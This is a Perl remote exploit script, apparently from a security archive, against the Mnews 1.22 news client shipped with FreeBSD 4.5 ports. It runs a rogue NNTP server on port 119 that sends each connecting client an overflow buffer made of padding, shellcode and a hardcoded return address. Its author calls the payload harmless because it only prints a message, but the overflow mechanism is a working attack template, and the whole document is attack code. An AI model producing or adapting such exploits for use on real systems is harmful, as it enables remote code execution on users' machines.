#!/usr/bin/perl -w 
# 
# Remote FreeBSD exploit for the Mnews port version 1.22 which is shipped 
# with the 4.5-RELEASE ports collection. 
# 
# This exploit is pretty harmless as it only prints a small message to 
# stdout (NAI?). 
# 
# Written by zillion[at]safemode.org (!shit) 
# 
# http://www.safemode.org 
# http://www.snosoft.com 

use IO::Socket; 

$shellcode = 

        "\xeb\x21\x5e\x31\xc0\x31\xdb\xb3\x3c\x80\xeb\x32\x88\x1e\x88". 
        "\x5e\x14\x6a\x15\x56\x6a\x01\xb0\x04\x50\xcd\x80\x31\xc0\x50". 
        "\xb0\x01\x50\xcd\x80\xe8\xda\xff\xff\xff\x23\x57\x61\x73\x73". 
        "\x73\x73\x75\x70\x70\x70\x70\x70\x20\x21\x21\x20\x3f\x3f\x3f". 
        "\x23"; 

# normal \x90 nops don't work here.. 

$nop = "A"; 
$esp = 0xbfbff65e; 
$off = "-70"; 
$size = 762; 

for ($i = 0; $i < ($size - length($shellcode)); $i++) { 
    $buffer .= "$nop"; 
} 

$buffer .= $shellcode; 
$buffer .= pack('l', ($esp + $off)); 
$buffer .= pack('l', ($esp + $off)); 

printf("Starting to listen for incoming connections... buffer size 
%d\n",length($buffer)); 
print("The new return address: 0x", sprintf('%lx',($esp + $off)), "\n"); 

my $sock = new IO::Socket::INET ( 
                                 LocalPort => 119, 
                                 Proto => 'tcp', 
                                 Listen => 1, 
                                 Reuse => 1, 
                                ); 

while($cl = $sock->accept()) { 

sleep 1; 
print $cl "200 $buffer\n"; 
sleep 3; 

}